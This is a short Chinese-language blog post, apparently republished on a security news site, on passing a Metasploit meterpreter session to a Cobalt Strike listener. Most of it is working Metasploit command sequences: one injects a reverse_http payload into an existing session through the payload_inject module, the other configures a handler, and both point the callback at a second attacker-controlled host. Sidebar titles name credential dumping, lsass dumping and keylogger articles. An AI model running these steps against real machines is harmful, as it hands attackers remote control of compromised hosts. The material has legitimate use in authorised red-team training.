MSF 派生 Cobalt Strike 会话

2023年12月15日22:37:13评论20 views字数 509阅读1分41秒阅读模式

利用 Metasploit 派生 Cobalt Strike 会话

信息.

metasploit IP:192.168.1.100 PORT:4444
Cobalt Strike IP:192.168.1.101 PORT:5555

有 meterpreter 会话

利用 payload_inject 模块注入新的 payload.

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set session 1
set disablepayloadhandler true
run

无 meterpreter 会话

在监听时将 LHOST 和 LPORT 改成 Cobalt Strike 对应的 IP 和 PORT.

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set disablepayloadhandler true 
run

- By:X1r0z[exp10it.cn]

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2023年12月15日22:37:13
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
MSF 派生 Cobalt Strike 会话http://cn-sec.com/archives/2304684.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

MSF 派生 Cobalt Strike 会话

有 meterpreter 会话

无 meterpreter 会话

php Thread实例

获取wdigest明文密码加密传输至远程服务器

dump lsass进程

CVE-2020-0688 powershell版

CVE-2020-0601 伪造签名笔记

从零开始学windows API

查看注册表键值修改时间

c++ 修改注册表键值

keylogger

使用 R820T2 电视棒收听 FM 广播

发表评论

在线咨询

微信